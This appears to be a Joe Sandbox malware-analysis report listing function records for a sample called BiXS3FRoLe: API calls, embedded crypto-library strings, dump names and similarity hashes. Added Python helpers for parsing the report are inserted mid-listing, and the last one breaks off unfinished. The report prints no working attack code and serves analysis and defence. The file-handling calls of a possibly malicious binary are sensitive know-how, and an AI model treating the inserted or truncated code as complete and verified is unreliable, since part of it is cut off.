                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CounterErrorException@8LastPerformanceQueryThrow
                                                                                                        • String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error
                                                                                                        • API String ID: 651023626-2136607233
                                                                                                        • Opcode ID: e2ecfd8528aadefe6303835bb1e99057c501e56c3a3249067049a3e5bdc3c5cc
                                                                                                        • Instruction ID: 20bc7daf46137a0f1f107989c9a42e2a2f7a9ca37597dc75d1649bfb6df687ec
                                                                                                        • Opcode Fuzzy Hash: e2ecfd8528aadefe6303835bb1e99057c501e56c3a3249067049a3e5bdc3c5cc
                                                                                                        • Instruction Fuzzy Hash: F5415B71A04348EBDB10EFA4DD45B9EB7F8FB09B00F1042AAF815A7291DF74A904CB95
                                                                                                        APIs
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1D76B
                                                                                                        • operator+.LIBVCRUNTIME ref: 00B1D776
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1D783
                                                                                                          • Part of subcall function 00B1B317: __aulldvrm.LIBCMT ref: 00B1B348
                                                                                                          • Part of subcall function 00B1B317: DName::doPchar.LIBVCRUNTIME ref: 00B1B365
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1D7F9
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1D806
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1D829
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: NameName::$Name::doPchar__aulldvrmoperator+
                                                                                                        • String ID: `non-type-template-parameter$generic-type-
                                                                                                        • API String ID: 421312391-1834441707
                                                                                                        • Opcode ID: fbb79a9383e7e2ff74b77f1c926678a5d8a0761d81cd98927d2687c25869b106
                                                                                                        • Instruction ID: b0140ac567851fca862b027605f9952b61bb81dae97af3c2616a4f2485c1dc08
                                                                                                        • Opcode Fuzzy Hash: fbb79a9383e7e2ff74b77f1c926678a5d8a0761d81cd98927d2687c25869b106
                                                                                                        • Instruction Fuzzy Hash: 34310FB29055049ED719DB6CD891BFA7BF6EB02310FE840D9E8459B2D2DB308DC6C7A0
                                                                                                        APIs
                                                                                                        • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00B15D40
                                                                                                          • Part of subcall function 00B1600F: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00B15A73), ref: 00B1601F
                                                                                                        • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00B15D55
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B15D64
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B15D72
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B15E28
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B15E36
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Exception@8Throwstd::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                                                                                                        • String ID: pContext$switchState
                                                                                                        • API String ID: 2757187270-2660820399
                                                                                                        • Opcode ID: 4e89a16d8af70710d50cadcd8e4b3d03454e5fccdf3dfb54321c0195a6c6f0c6
                                                                                                        • Instruction ID: 11e1ec9a74346521e85d5ecb924241d6a29fb52560ee50631606ef941dbba041
                                                                                                        • Opcode Fuzzy Hash: 4e89a16d8af70710d50cadcd8e4b3d03454e5fccdf3dfb54321c0195a6c6f0c6
                                                                                                        • Instruction Fuzzy Hash: CA31A132A00604DBCF15EF64D885EAD73F9EB84310BA044E9E9119B251DF70EE41CB90
                                                                                                        APIs
                                                                                                        • UnDecorator::getArgumentList.LIBVCRUNTIME ref: 00B1C655
                                                                                                          • Part of subcall function 00B1C53F: Replicator::operator[].LIBVCRUNTIME ref: 00B1C5AB
                                                                                                          • Part of subcall function 00B1C53F: DName::operator+=.LIBVCRUNTIME ref: 00B1C5B3
                                                                                                        • DName::operator+.LIBCMT ref: 00B1C6AC
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1C6F5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                        • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                        • API String ID: 834187326-2211150622
                                                                                                        • Opcode ID: e50bd811855512e12fb23a7c1fd4e249fe4fef6f19eae72d5ec3039ddb132793
                                                                                                        • Instruction ID: 573f44c36e0c305ced5f5b7e219fba9c09a26492519ce00c0422f3213b6933ea
                                                                                                        • Opcode Fuzzy Hash: e50bd811855512e12fb23a7c1fd4e249fe4fef6f19eae72d5ec3039ddb132793
                                                                                                        • Instruction Fuzzy Hash: 56218C702412049FDB04DF5CD5A1BAA3FF6EB1A345F9051EAE845DB262CF31D985CBA0
                                                                                                        APIs
                                                                                                        • UnDecorator::UScore.LIBVCRUNTIME ref: 00B1C8B8
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1C8C2
                                                                                                          • Part of subcall function 00B1B218: DName::doPchar.LIBVCRUNTIME ref: 00B1B23F
                                                                                                        • UnDecorator::getScopedName.LIBVCRUNTIME ref: 00B1C901
                                                                                                        • DName::operator+=.LIBVCRUNTIME ref: 00B1C90B
                                                                                                        • DName::operator+=.LIBCMT ref: 00B1C91A
                                                                                                        • DName::operator+=.LIBCMT ref: 00B1C926
                                                                                                        • DName::operator+=.LIBCMT ref: 00B1C933
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                        • String ID: void
                                                                                                        • API String ID: 1480779885-3531332078
                                                                                                        • Opcode ID: f26043468b23768ff8e08e21af2c9b160561f5aa48559a6af8d0a538bd46f6eb
                                                                                                        • Instruction ID: ca1ab614f65894bb4d6fbff78069f273ae35d9e07fff5b1603c6e1ad977d720b
                                                                                                        • Opcode Fuzzy Hash: f26043468b23768ff8e08e21af2c9b160561f5aa48559a6af8d0a538bd46f6eb
                                                                                                        • Instruction Fuzzy Hash: E511A174440204AECB09EF64C996FEDBFF4EB11340F8040D9E442AB2E2CB709AC5CB50
                                                                                                        APIs
                                                                                                        • SetEvent.KERNEL32(00000000,AE695AF0), ref: 00AFEB69
                                                                                                        • SetEvent.KERNEL32(00000000,AE695AF0), ref: 00AFEBC6
                                                                                                        • ReleaseSemaphore.KERNEL32(?,?,00000000,AE695AF0), ref: 00AFEBDA
                                                                                                        • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00AFEBFF
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00AFEC33
                                                                                                        • SetEvent.KERNEL32(00000000), ref: 00AFEC70
                                                                                                          • Part of subcall function 00A750A0: CreateEventA.KERNEL32(?,?,?,?,AE695AF0,AE695AF0,?,00AFFCE2,?,AE695AF0,AE695AF0,?,?,?,00000000,00000000), ref: 00A750D4
                                                                                                          • Part of subcall function 00A750A0: CloseHandle.KERNEL32(00000000,?,00AFFCE2,?,AE695AF0,AE695AF0,?,?,?,00000000,00000000,AE695AF0,AE695AF0), ref: 00A750EF
                                                                                                        • SetEvent.KERNEL32(00000000,?,AE695AF0), ref: 00AFECF8
                                                                                                        • CloseHandle.KERNEL32(?,AE695AF0), ref: 00AFED26
                                                                                                        • CloseHandle.KERNEL32(?,AE695AF0), ref: 00AFEE03
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Event$CloseHandle$ReleaseSemaphore$Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 573037752-0
                                                                                                        • Opcode ID: 8aec19df3326d1254062dcf8d9918830d3bc8d2f1fd50e02e3113257ba16b54c
                                                                                                        • Instruction ID: 2c1f0da0a7ed76533f7a7dfabfb4b80276b227170043514a8770e9fb86597bad
                                                                                                        • Opcode Fuzzy Hash: 8aec19df3326d1254062dcf8d9918830d3bc8d2f1fd50e02e3113257ba16b54c
                                                                                                        • Instruction Fuzzy Hash: 22A1AE70A002099FDB15DFA8C98476EBBB4FF44314F244198F909AB3A1DB35ED56CB91
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 1282221369-0
                                                                                                        • Opcode ID: 85f1cd16e7eccd8b6a533d12f6c25c2dbeb976aa0e18ce0c9a6ebfa1704ed3fc
                                                                                                        • Instruction ID: 7309b3b064e228905d31f361ff4d8750e813bbaa572bf36ce484214033241681
                                                                                                        • Opcode Fuzzy Hash: 85f1cd16e7eccd8b6a533d12f6c25c2dbeb976aa0e18ce0c9a6ebfa1704ed3fc
                                                                                                        • Instruction Fuzzy Hash: F161F572900355ABDB21AFF4988276E7FE5EF06320F2451EEE945B7281EF359D008B90
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B3437A: GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
                                                                                                          • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343B1
                                                                                                          • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
                                                                                                          • Part of subcall function 00B3437A: _abort.LIBCMT ref: 00B343F8
                                                                                                        • _memcmp.LIBVCRUNTIME ref: 00B31620
                                                                                                        • _free.LIBCMT ref: 00B31691
                                                                                                        • _free.LIBCMT ref: 00B316AA
                                                                                                        • _free.LIBCMT ref: 00B316DC
                                                                                                        • _free.LIBCMT ref: 00B316E5
                                                                                                        • _free.LIBCMT ref: 00B316F1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                        • String ID: C
                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                        • Opcode ID: 033f6addefc636dc26416813d97c2bde92e9fbd0801cd34ae28934af7f5a4cda
                                                                                                        • Instruction ID: 4bc901942465f62b66fe73a2de653492100a59bb315b7c6e82ebb1fa97a48bf4
                                                                                                        • Opcode Fuzzy Hash: 033f6addefc636dc26416813d97c2bde92e9fbd0801cd34ae28934af7f5a4cda
                                                                                                        • Instruction Fuzzy Hash: 5BB11A75901219DBDB24DF18C885AADB7F8FB58314F6449EAE84AA7350E770AE90CF40
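Every function record in this listing follows the same fixed layout (APIs, optional Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), and most of the API references are into the statically linked runtime (LIBCMT, LIBVCRUNTIME, LIBCONCRT: the CRT, the MSVC name demangler and ConcRT), which is noise when triaging. The Python below is an added example, not Joe Sandbox code: it parses records of this shape into structured data, tallies the Win32 references that are actually worth reading, and lets an analyst pivot from an embedded string (such as the padding-scheme messages a few records down) to the record that carries it. The record layout is inferred from the rendered text of this report and is an assumption, not a documented schema; the two sample records are copied, trimmed, from this listing.

```python
import re
from collections import Counter

# Pseudo-modules the IDA plugin uses for statically linked runtime code;
# references into these are CRT/demangler/ConcRT noise, not Win32 imports.
RUNTIME_MODULES = {"LIBCMT", "LIBVCRUNTIME", "LIBCONCRT"}

# Matches "SetEvent.KERNEL32(00000000,AE695AF0), ref: 00AFEB69",
# "DName::DName.LIBVCRUNTIME ref: 00B1D76B" and the indented
# "Part of subcall function 00A750A0: CreateEventA.KERNEL32(...), ref: ..." form.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>.+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})$")
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+?): ?(?P<value>.*)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}


def parse_report(text):
    """Return one dict per function record; a record starts at each 'APIs'."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = {"apis": [], "strings": [], "dumps": [], "fields": {}}
                records.append(current)
            section = line
            continue
        if current is None:  # tail of a record that began before this text
            continue
        body = line[1:].strip() if line.startswith("•") else line
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                current["apis"].append({
                    "name": m["name"], "module": m["module"], "args": m["args"],
                    "ref": m["ref"], "via_subcall": m["sub"]})  # None if direct
        elif section == "Strings":
            m = STRING_RE.match(body)
            if m:
                current["strings"].append((m["text"], m["ref"]))
        else:
            m = FIELD_RE.match(body)
            if m and m["key"] in ("Source File", "Associated"):
                # "Download File" is the link caption the rendered page appends
                # to dump names; it is not part of the name.
                current["dumps"].append(
                    m["value"].replace("Download File", "").strip())
            elif m:
                current["fields"][m["key"]] = m["value"]
    return records


def imported_api_calls(records):
    """Count Win32 API references across all records, dropping runtime noise:
    the short list worth reading first when triaging the listing."""
    counts = Counter()
    for rec in records:
        for api in rec["apis"]:
            if api["module"] not in RUNTIME_MODULES:
                counts[f"{api['name']}.{api['module']}"] += 1
    return counts


def find_records_mentioning(records, needle):
    """Indices of records whose xref'd strings or String ID field contain
    needle (case-insensitive): a pivot from an artefact such as a padding
    error message back to the function that embeds it."""
    needle = needle.lower()
    hits = []
    for i, rec in enumerate(records):
        texts = [s for s, _ in rec["strings"]] + [rec["fields"].get("String ID", "")]
        if any(needle in s.lower() for s in texts):
            hits.append(i)
    return hits


# Constructed sample: two records copied, trimmed, from this report's listing.
SAMPLE = """\
APIs
• SetEvent.KERNEL32(00000000,AE695AF0), ref: 00AFEB69
• ReleaseSemaphore.KERNEL32(?,?,00000000,AE695AF0), ref: 00AFEBDA
• CloseHandle.KERNEL32(?), ref: 00AFEC33
  • Part of subcall function 00A750A0: CreateEventA.KERNEL32(?,?,?,?,AE695AF0,AE695AF0,?,00AFFCE2,?,AE695AF0,AE695AF0,?,?,?,00000000,00000000), ref: 00A750D4
• SetEvent.KERNEL32(00000000), ref: 00AFEC70
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: Event$CloseHandle$ReleaseSemaphore$Create
• String ID:
• API String ID: 573037752-0
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00ABD4DC
Strings
• FilterWithBufferedInput, xrefs: 00ABD554
• StreamTransformationFilter: W3C_PADDING cannot be used with , xrefs: 00ABD3C0
• BlockPaddingScheme, xrefs: 00ABD356
"""
```

Run `parse_report` over the saved text of the report and feed `imported_api_calls` to a spreadsheet or a YARA/Sigma draft; the Instruction ID and Opcode Fuzzy Hash fields survive in `fields`, so matching records across two reports of related samples is a dictionary join on those keys.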
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABD4DC
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABD57D
                                                                                                        Strings
                                                                                                        • FilterWithBufferedInput, xrefs: 00ABD554
                                                                                                        • StreamTransformationFilter: W3C_PADDING cannot be used with , xrefs: 00ABD3C0
                                                                                                        • BlockPaddingScheme, xrefs: 00ABD356
                                                                                                        • StreamTransformationFilter: PKCS_PADDING cannot be used with , xrefs: 00ABD4B8
                                                                                                        • StreamTransformationFilter: ONE_AND_ZEROS_PADDING cannot be used with , xrefs: 00ABD3F9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: BlockPaddingScheme$FilterWithBufferedInput$StreamTransformationFilter: ONE_AND_ZEROS_PADDING cannot be used with $StreamTransformationFilter: PKCS_PADDING cannot be used with $StreamTransformationFilter: W3C_PADDING cannot be used with
                                                                                                        • API String ID: 2005118841-2286867357
                                                                                                        • Opcode ID: 3963d4fb1be719716596c7d7084372aaa5e769417423d557675c1d69f2706845
                                                                                                        • Instruction ID: 29fac5737181ac8ba4e4a7c148a7b8e08849600fe0e6bed06d606d6470003d3f
                                                                                                        • Opcode Fuzzy Hash: 3963d4fb1be719716596c7d7084372aaa5e769417423d557675c1d69f2706845
                                                                                                        • Instruction Fuzzy Hash: 3C815A75A00219EFCB14DF64C884FDABBF8FF49714F1045A9E815A72A2EB71AD44CB90
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00008003,AE695AF0,00000000,774D3560), ref: 00A7D61D
                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,08000000,00000000), ref: 00A7D645
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00A7D69E
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00A7D6D8
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,-00B90110,00000000,-00B90110,00000000), ref: 00A7D74F
                                                                                                        • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7D8DB
                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7D917
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7D91E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Pointer$CloseCreateErrorHandleModeReadSizeWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 1214154791-0
                                                                                                        • Opcode ID: 61404a0231b0ac129422bead7e7fcd9eb68b1933de5a9f63673802aadd322c39
                                                                                                        • Instruction ID: 34397682317189763e6f9f09d07651546006c2262b2be73f9b1028d37d112934
                                                                                                        • Opcode Fuzzy Hash: 61404a0231b0ac129422bead7e7fcd9eb68b1933de5a9f63673802aadd322c39
                                                                                                        • Instruction Fuzzy Hash: 53D1CD71D00258EFEB24DFA4CD85BDDBBB5BF49304F148198E408AB291DBB45A88CF91
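The record above (SetErrorMode through CloseHandle, refs 00A7D61D to 00A7D91E) lists the call arguments only as raw hex. The decoder below is an added example; it is not part of the Joe Sandbox report or of the analysed sample. It parses those eight API lines, copied from the record as constructed input, and translates the CreateFileW and SetErrorMode arguments into their documented Win32 flag names. The parse format (`Func.MODULE(args), ref: ADDRESS`, with `?` marking an argument the sandbox did not recover) is assumed from how this report renders calls; the constants are the standard SDK values.

```python
"""Decode the raw argument values of a Joe Sandbox "APIs" record into Win32 flag names.

Added example, not part of the Joe Sandbox report or of the analysed sample.
Assumed input format (how the report renders a call):
    Func.MODULE(arg,arg,...), ref: ADDRESS      ('?' = argument not recovered)
Flag values are the documented Win32 SDK constants (winnt.h, fileapi.h, errhandlingapi.h).
"""
import re
from dataclasses import dataclass

# Constructed input: the eight API lines of the report record at 00A7D61D-00A7D91E, copied verbatim.
REPORT_APIS = """\
SetErrorMode.KERNEL32(00008003,AE695AF0,00000000,774D3560), ref: 00A7D61D
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,08000000,00000000), ref: 00A7D645
GetFileSize.KERNEL32(00000000,00000000), ref: 00A7D69E
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00A7D6D8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,-00B90110,00000000,-00B90110,00000000), ref: 00A7D74F
SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7D8DB
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7D917
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7D91E
"""

API_LINE = re.compile(
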